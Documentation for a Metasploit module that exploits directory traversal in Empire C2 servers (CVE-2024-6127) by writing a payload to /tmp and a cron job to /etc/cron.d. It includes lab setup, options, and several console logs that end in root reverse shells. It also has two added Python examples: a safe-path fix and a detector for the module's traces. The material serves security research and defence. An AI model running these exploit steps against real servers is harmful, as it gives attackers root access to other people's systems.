Vulnerable Application
This module exploits a directory traversal vulnerability in both BC-SECURITY/Empire C2 Framework (<5.9.3) and ProjectEmpire/Empire (<f030cf62). It writes the payload to the /tmp/ directory and then drops a file into /etc/cron.d/ that executes the payload.
The vulnerability affects:
* BC-SECURITY/Empire C2 Framework (<5.9.3)
* ProjectEmpire/Empire (<f030cf62)
This module was successfully tested on:
* BC-SECURITY/Empire C2 Framework (v5.9.2) on Kali Linux 6.6.15
* BC-SECURITY/Empire C2 Framework (v5.9.2) installed with Docker on Kali Linux 6.6.15
* ProjectEmpire/Empire (03ca7bdbcc81457da8e8c1419b36adf66fe9b110) installed with Docker on Kali Linux 6.6.15
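To make the bug class concrete, here is an added Python example (it is not Empire's code and not the Metasploit module's) of how a filename supplied by an agent, when joined under a per-session downloads directory like the downloads/<session>/ path that appears in the scenario output below, escapes that directory if it contains ../ components or is absolute, next to a hardened join that canonicalizes the result and refuses anything outside the session directory. The function names, the session id reuse and the scratch directory layout are this example's own assumptions; it never touches the real /tmp or /etc/cron.d.

```python
import os
import tempfile

# Added example, not Empire's code: the per-session "downloads/<session>/"
# layout mirrors the path shown in the module output; everything else
# (function names, sample filenames) is this example's own.


def unsafe_save_path(downloads_dir: str, session: str, agent_filename: str) -> str:
    """Naive join that trusts the agent-supplied filename.

    os.path.join discards downloads_dir entirely when agent_filename is
    absolute, and normpath folds '..' components, so the result can point
    anywhere on the filesystem (for example /tmp or /etc/cron.d).
    """
    return os.path.normpath(os.path.join(downloads_dir, session, agent_filename))


def safe_save_path(downloads_dir: str, session: str, agent_filename: str) -> str:
    """Hardened join: strip leading separators, resolve symlinks and '..',
    then require the final path to stay inside the session directory.
    Nested sub-directories supplied by the agent are still allowed."""
    session_dir = os.path.realpath(os.path.join(downloads_dir, session))
    relative = agent_filename.lstrip("/\\")
    dest = os.path.realpath(os.path.join(session_dir, relative))
    if dest == session_dir or os.path.commonpath([session_dir, dest]) != session_dir:
        raise ValueError(f"path traversal rejected: {agent_filename!r}")
    return dest


def demo() -> dict:
    """Run both joins against constructed inputs inside a scratch directory.

    The scratch tree stands in for the server root, so the escaped write
    resolves to <root>/etc/cron.d rather than the real /etc/cron.d.
    """
    root = tempfile.mkdtemp(prefix="empire-demo-")
    downloads = os.path.join(root, "downloads")
    session = "LML47FWS"                      # session id taken from the scenario output
    session_dir = os.path.join(downloads, session)
    os.makedirs(session_dir)

    hostile = "../../etc/cron.d/AeVTTPiZ"     # constructed: two levels up, into cron.d
    absolute = "/etc/cron.d/AeVTTPiZ"         # constructed: absolute path variant
    benign = "loot/creds.txt"                 # constructed: legitimate nested download

    result = {"root": root}
    result["unsafe_relative"] = unsafe_save_path(downloads, session, hostile)
    result["unsafe_absolute"] = unsafe_save_path(downloads, session, absolute)
    # Neither naive result stays under downloads/<session>/.
    result["unsafe_escaped"] = not result["unsafe_relative"].startswith(session_dir + os.sep)

    try:
        safe_save_path(downloads, session, hostile)
        result["safe_rejects_relative"] = False
    except ValueError:
        result["safe_rejects_relative"] = True

    # The absolute variant is neutralised rather than rejected: it becomes a
    # path relative to the session directory and stays contained.
    real_session_dir = os.path.realpath(session_dir)
    result["safe_absolute_contained"] = safe_save_path(
        downloads, session, absolute).startswith(real_session_dir + os.sep)
    result["safe_benign_contained"] = safe_save_path(
        downloads, session, benign).startswith(real_session_dir + os.sep)
    return result


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key:24} {value}")
```

Running the block prints where each variant lands; the unsafe join is the behaviour a traversal exploit relies on, the safe join is the shape of fix that closes it without breaking legitimate nested downloads.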
Install and run the vulnerable Empire
BC-SECURITY/Empire
Install your favorite virtualization engine (VirtualBox or VMware) on your preferred platform.
Install Kali Linux (or other Linux distro) in your virtualization engine.
Pull the pre-built Empire docker container (<5.9.3) in your VM.
docker pull bcsecurity/empire:v5.9.2
Run the server and the client on the same VM.
Run the server.
docker run -it --net="host" -v /tmp:/tmp -v /etc/cron.d:/etc/cron.d bcsecurity/empire:v5.9.2
(Sharing the host network, /tmp and /etc/cron.d with the container is not a realistic deployment, but it keeps the lab simple: the payload and the cron job land on the host rather than inside the container.) or
docker run -it --net="host" bcsecurity/empire:v5.9.2
docker exec -it <server container id> bash
apt update
apt install cron
cron
(The payload and the cron job are written inside the container, so cron has to be installed and started there by hand as above.)
Run the client.
docker run -it --net="host" bcsecurity/empire:v5.9.2 client
Execute Empire listener on client.
uselistener http
set Host <rhost>
set Port <port>
execute
ProjectEmpire/Empire
Install your favorite virtualization engine (VirtualBox or VMware) on your preferred platform.
Install Kali Linux (or other Linux distro) in your virtualization engine.
Clone Empire.
git clone https://github.com/EmpireProject/Empire.git
cd Empire
git checkout 03ca7bdbcc81457da8e8c1419b36adf66fe9b110
docker pull empireproject/empire
docker run -it --net="host" -v $(pwd):/opt/Empire -v /tmp:/tmp -v /etc/cron.d:/etc/cron.d empireproject/empire /bin/bash
(The payload and the cron job are written on the host, not inside the container.) or
docker run -it --net="host" empireproject/empire /bin/bash
cron
(The payload and the cron job are written inside the container, so cron has to be started there by hand as above.)
cd setup
./reset.sh
(Empire starts.)
Execute listener.
listeners
set Host <rhost>
set Port <port>
run
Verification Steps
Install the application
Start msfconsole
Do: use exploit/linux/http/empire_skywalker
Do: set rhost <rhost>
Do: set rport <port>
Do: set lhost <attacker-ip>
Optional: set CVE <cve>
Do: run
Have the generated request processed by a vulnerable version of Empire
You should get a shell or a Meterpreter session
Options
TARGETURI (optional)
This is the base URI path. This is used when CVE is set to Original. Default is /.
STAGE0_URI (required)
This is the URI path requested by the initial launcher. This is used when CVE is set to Original. Default is index.asp.
STAGE1_URI (required)
This is the URI path used by the RSA key post. This is used when CVE is set to Original. Default is index.jsp.
PROFILE (optional)
This is the Empire agent traffic profile URI. This is used when CVE is set to Original.
CVE (required)
This is the vulnerability to use. Default is CVE-2024-6127, but Original can also be chosen.
STAGE_PATH (required)
This is Empire's default staging path. This is used when CVE is set to CVE-2024-6127. Default is login/process.php. (reference)
PROFILE (required)
This is Empire's default agent communication profile (a User-Agent string). This is used when CVE is set to CVE-2024-6127. Default is Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko. (reference)
Scenarios
BC-SECURITY/Empire C2 Framework (v5.9.2) installed with Docker on Kali Linux 6.6.15 (target 0, port 80)
msf6 > use exploit/linux/http/empire_skywalker
[*] No payload configured, defaulting to python/meterpreter/reverse_tcp
msf6 exploit(linux/http/empire_skywalker) > set rhost 192.168.56.7
rhost => 192.168.56.7
msf6 exploit(linux/http/empire_skywalker) > set rport 80
rport => 80
msf6 exploit(linux/http/empire_skywalker) > set lhost 192.168.56.1
lhost => 192.168.56.1
msf6 exploit(linux/http/empire_skywalker) > check
[*] 192.168.56.7:80 - The target appears to be vulnerable.
msf6 exploit(linux/http/empire_skywalker) > run
[*] Started reverse TCP handler on 192.168.56.1:4444
[+] Successfully negotiated an artificial Empire agent
[*] Writing payload to /tmp/NYLkIKRK
[*] Writing cron job to /etc/cron.d/AeVTTPiZ
[*] Waiting for cron job to run, can take up to 60 seconds
[*] Sending stage (24772 bytes) to 192.168.56.7
[+] Deleted /etc/cron.d/AeVTTPiZ
[+] Deleted /tmp/NYLkIKRK
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.7:48026) at 2024-07-20 11:32:03 +0900
[!] This exploit may require manual cleanup of '/var/lib/powershell-empire/empire/server/downloads/LML47FWS/agent.log' on the target
meterpreter > sysinfo
Computer : kali
OS : Linux 6.6.15-amd64 #1 SMP PREEMPT_DYNAMIC Kali 6.6.15-2kali1 (2024-05-17)
Architecture : x64
System Language : en_US
Meterpreter : python/linux
BC-SECURITY/Empire C2 Framework (v5.9.2) installed with Docker on Kali Linux 6.6.15 (target 1, port 8080)
msf6 > use exploit/linux/http/empire_skywalker
[*] Using configured payload linux/x86/shell/reverse_tcp
msf6 exploit(linux/http/empire_skywalker) > set rhost 192.168.56.6
rhost => 192.168.56.6
msf6 exploit(linux/http/empire_skywalker) > set rport 8080
rport => 8080
msf6 exploit(linux/http/empire_skywalker) > set lhost 192.168.56.1
lhost => 192.168.56.1
msf6 exploit(linux/http/empire_skywalker) > set target 1
target => 1
msf6 exploit(linux/http/empire_skywalker) > set payload linux/x86/shell/reverse_tcp
payload => linux/x86/shell/reverse_tcp
msf6 exploit(linux/http/empire_skywalker) > check
[*] 192.168.56.6:8080 - The target appears to be vulnerable.
msf6 exploit(linux/http/empire_skywalker) > run
[*] Started reverse TCP handler on 192.168.56.1:4444
[+] Successfully negotiated an artificial Empire agent
[*] Writing payload to /tmp/jJzYkeKV
[*] Writing cron job to /etc/cron.d/nFnFIbim
[*] Waiting for cron job to run, can take up to 60 seconds
[*] Sending stage (36 bytes) to 192.168.56.6
[+] Deleted /etc/cron.d/nFnFIbim
[+] Deleted /tmp/jJzYkeKV
[!] Tried to delete /var/lib/powershell-empire/empire/server/downloads/WV9TEJTE/agent.log, unknown result
[*] Command shell session 3 opened (192.168.56.1:4444 -> 192.168.56.6:42068) at 2024-07-20 14:40:09 +0900
whoami
root
BC-SECURITY/Empire C2 Framework (v5.9.2) installed with Docker on Kali Linux 6.6.15 (target 2, port 8080)
msf6 > use exploit/linux/http/empire_skywalker
[*] Using configured payload linux/x86/shell/reverse_tcp
msf6 exploit(linux/http/empire_skywalker) > set rhost 192.168.56.6
rhost => 192.168.56.6
msf6 exploit(linux/http/empire_skywalker) > set rport 8080
rport => 8080
msf6 exploit(linux/http/empire_skywalker) > set lhost 192.168.56.1
lhost => 192.168.56.1
msf6 exploit(linux/http/empire_skywalker) > set target 2
target => 2
msf6 exploit(linux/http/empire_skywalker) > set payload linux/x64/shell/reverse_tcp
payload => linux/x64/shell/reverse_tcp
msf6 exploit(linux/http/empire_skywalker) > check
[*] 192.168.56.6:8080 - The target appears to be vulnerable.
msf6 exploit(linux/http/empire_skywalker) > run
[*] Started reverse TCP handler on 192.168.56.1:4444
[+] Successfully negotiated an artificial Empire agent
[*] Writing payload to /tmp/qxlOSIYF
[*] Writing cron job to /etc/cron.d/ugrYIJzf
[*] Waiting for cron job to run, can take up to 60 seconds
[*] Sending stage (38 bytes) to 192.168.56.6
[+] Deleted /etc/cron.d/ugrYIJzf
[+] Deleted /tmp/qxlOSIYF
[!] Tried to delete /var/lib/powershell-empire/empire/server/downloads/JJR8EMKK/agent.log, unknown result
[*] Command shell session 4 opened (192.168.56.1:4444 -> 192.168.56.6:46040) at 2024-07-20 14:44:09 +0900
whoami
root
ProjectEmpire/Empire (03ca7bdbcc81457da8e8c1419b36adf66fe9b110) installed with Docker on Kali Linux 6.6.15 (target 0, port 8080)
msf6 exploit(linux/http/empire_skywalker) > set rhost 192.168.56.6
rhost => 192.168.56.6
msf6 exploit(linux/http/empire_skywalker) > set rport 8080
rport => 8080
msf6 exploit(linux/http/empire_skywalker) > set lhost 192.168.56.1
lhost => 192.168.56.1
msf6 exploit(linux/http/empire_skywalker) > set CVE Original
CVE => Original
msf6 exploit(linux/http/empire_skywalker) > check
[*] 192.168.56.6:8080 - The target appears to be vulnerable.
msf6 exploit(linux/http/empire_skywalker) > run
[*] Started reverse TCP handler on 192.168.56.1:4444
[+] Successfully negotiated an artificial Empire agent
[*] Writing payload to /tmp/PSDaqPOJ
[*] Writing cron job to /etc/cron.d/KQlwBZQk
[*] Waiting for cron job to run, can take up to 60 seconds
[*] Sending stage (24772 bytes) to 192.168.56.6
[+] Deleted /etc/cron.d/KQlwBZQk
[+] Deleted /tmp/PSDaqPOJ
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.6:38552) at 2024-07-24 18:01:04 +0900
[!] This exploit may require manual cleanup of '/agent.log' on the target
meterpreter > sysinfo
Computer : kali
OS : Linux 6.6.15-amd64 #1 SMP PREEMPT_DYNAMIC Kali 6.6.15-2kali1 (2024-05-17)
Architecture : x64
System Language : en_US
Meterpreter : python/linux
meterpreter >
ProjectEmpire/Empire (03ca7bdbcc81457da8e8c1419b36adf66fe9b110) installed with Docker on Kali Linux 6.6.15 (target 1, port 8080)
msf6 > use exploit/linux/http/empire_skywalker
[*] Using configured payload linux/x86/shell/reverse_tcp
msf6 exploit(linux/http/empire_skywalker) > set rhost 192.168.56.6
rhost => 192.168.56.6
msf6 exploit(linux/http/empire_skywalker) > set rport 8080
rport => 8080
msf6 exploit(linux/http/empire_skywalker) > set lhost 192.168.56.1
lhost => 192.168.56.1
msf6 exploit(linux/http/empire_skywalker) > set CVE Original
CVE => Original
msf6 exploit(linux/http/empire_skywalker) > set target 1
target => 1
msf6 exploit(linux/http/empire_skywalker) > set payload linux/x86/shell/reverse_tcp
payload => linux/x86/shell/reverse_tcp
msf6 exploit(linux/http/empire_skywalker) > check
[*] 192.168.56.6:8080 - The target appears to be vulnerable.
msf6 exploit(linux/http/empire_skywalker) > run
[*] Started reverse TCP handler on 192.168.56.1:4444
[+] Successfully negotiated an artificial Empire agent
[*] Writing payload to /tmp/VzTAquhE
[*] Writing cron job to /etc/cron.d/LjvThMOu
[*] Waiting for cron job to run, can take up to 60 seconds
[*] Sending stage (36 bytes) to 192.168.56.6
[+] Deleted /etc/cron.d/LjvThMOu
[+] Deleted /tmp/VzTAquhE
[!] Tried to delete /agent.log, unknown result
[*] Command shell session 2 opened (192.168.56.1:4444 -> 192.168.56.6:47140) at 2024-07-24 18:06:08 +0900
whoami
root
ProjectEmpire/Empire (03ca7bdbcc81457da8e8c1419b36adf66fe9b110) installed with Docker on Kali Linux 6.6.15 (target 2, port 8080)
msf6 > use exploit/linux/http/empire_skywalker
[*] Using configured payload linux/x86/shell/reverse_tcp
msf6 exploit(linux/http/empire_skywalker) > set rhost 192.168.56.6
rhost => 192.168.56.6
msf6 exploit(linux/http/empire_skywalker) > set rport 8080
rport => 8080
msf6 exploit(linux/http/empire_skywalker) > set lhost 192.168.56.1
lhost => 192.168.56.1
msf6 exploit(linux/http/empire_skywalker) > set cve Original
cve => Original
msf6 exploit(linux/http/empire_skywalker) > set target 2
target => 2
msf6 exploit(linux/http/empire_skywalker) > set payload linux/x64/shell/reverse_tcp
payload => linux/x64/shell/reverse_tcp
msf6 exploit(linux/http/empire_skywalker) > check
[*] 192.168.56.6:8080 - The target appears to be vulnerable.
msf6 exploit(linux/http/empire_skywalker) > run
[*] Started reverse TCP handler on 192.168.56.1:4444
[+] Successfully negotiated an artificial Empire agent
[*] Writing payload to /tmp/uuTqlfDp
[*] Writing cron job to /etc/cron.d/frDtYnmD
[*] Waiting for cron job to run, can take up to 60 seconds
[*] Sending stage (38 bytes) to 192.168.56.6
[+] Deleted /etc/cron.d/frDtYnmD
[+] Deleted /tmp/uuTqlfDp
[!] Tried to delete /agent.log, unknown result
[*] Command shell session 3 opened (192.168.56.1:4444 -> 192.168.56.6:51566) at 2024-07-24 18:08:08 +0900
whoami
root
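The scenario output above shows the artifacts this module leaves on an Empire server while it runs: a randomly named payload under /tmp/, a randomly named job file under /etc/cron.d/ that launches it, and an agent.log under the per-session downloads directory that the module may fail to remove. As an added example (not part of the module or of Empire), the Python below parses a cron.d directory for jobs whose command executes something from a world-writable temp location and lists stale agent.log files under downloads/<session>/. It runs against a constructed sample tree; the content of the cron line is an assumption, since the page shows only the file paths, and the TEMP_DIRS list and function names are this example's own.

```python
import os
import re
import tempfile

# Added example, not Empire's or the module's code. The cron.d line used
# as a sample is an assumption; the page shows only the file paths.

# cron.d lines: five schedule fields (or an @keyword), then user, then command.
CRON_LINE = re.compile(r"^\s*(?:@\w+\s+|(?:\S+\s+){5})(\S+)\s+(.+)$")

# Locations an unprivileged writer can reach; a scheduled job executing
# from here is a red flag on a C2 server.
TEMP_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")


def suspicious_cron_jobs(cron_d: str) -> list[dict]:
    """Return cron.d jobs whose command references a temp directory."""
    findings = []
    for name in sorted(os.listdir(cron_d)):
        path = os.path.join(cron_d, name)
        if not os.path.isfile(path):
            continue
        with open(path, encoding="utf-8", errors="replace") as fh:
            for lineno, raw in enumerate(fh, 1):
                line = raw.strip()
                # skip blanks, comments and environment assignments (SHELL=, PATH=)
                if not line or line.startswith("#") or "=" in line.split()[0]:
                    continue
                m = CRON_LINE.match(line)
                if not m:
                    continue
                user, command = m.groups()
                if any(d in command for d in TEMP_DIRS):
                    findings.append({"file": name, "line": lineno,
                                     "user": user, "command": command})
    return findings


def stale_agent_logs(downloads_dir: str) -> list[str]:
    """Return downloads/<session>/agent.log files left behind after a session."""
    hits = []
    for session in sorted(os.listdir(downloads_dir)):
        candidate = os.path.join(downloads_dir, session, "agent.log")
        if os.path.isfile(candidate):
            hits.append(candidate)
    return hits


def build_sample_tree() -> tuple[str, str]:
    """Create a constructed cron.d and downloads tree in a scratch directory."""
    root = tempfile.mkdtemp(prefix="empire-hunt-")
    cron_d = os.path.join(root, "cron.d")
    downloads = os.path.join(root, "downloads")
    os.makedirs(cron_d)
    os.makedirs(os.path.join(downloads, "LML47FWS"))
    os.makedirs(os.path.join(downloads, "WV9TEJTE"))

    # Benign Debian-style job (constructed).
    with open(os.path.join(cron_d, "e2scrub_all"), "w") as fh:
        fh.write("SHELL=/bin/sh\n")
        fh.write("PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n")
        fh.write("30 3 * * 0 root test -e /run/systemd/system || "
                 "SERVICE_MODE=1 /usr/lib/x86_64-linux-gnu/e2fsprogs/e2scrub_all_cron\n")
    # Job running a random file out of /tmp, named like the module's artifacts
    # (the line content is an assumption; only the file names come from the page).
    with open(os.path.join(cron_d, "AeVTTPiZ"), "w") as fh:
        fh.write("* * * * * root /tmp/NYLkIKRK\n")
    # One session left its agent.log behind, the other was cleaned up.
    with open(os.path.join(downloads, "LML47FWS", "agent.log"), "w") as fh:
        fh.write("constructed placeholder\n")
    return cron_d, downloads


if __name__ == "__main__":
    cron_d, downloads = build_sample_tree()
    for f in suspicious_cron_jobs(cron_d):
        print(f"[cron] {f['file']}:{f['line']} user={f['user']} cmd={f['command']}")
    for p in stale_agent_logs(downloads):
        print(f"[agent.log] {p}")
```

On a real host point suspicious_cron_jobs at /etc/cron.d and stale_agent_logs at the downloads directory of the Empire install (the scenario output shows /var/lib/powershell-empire/empire/server/downloads for the packaged BC-SECURITY build); because the module removes the payload and job file after roughly a minute, the agent.log residue is the artifact most likely to survive.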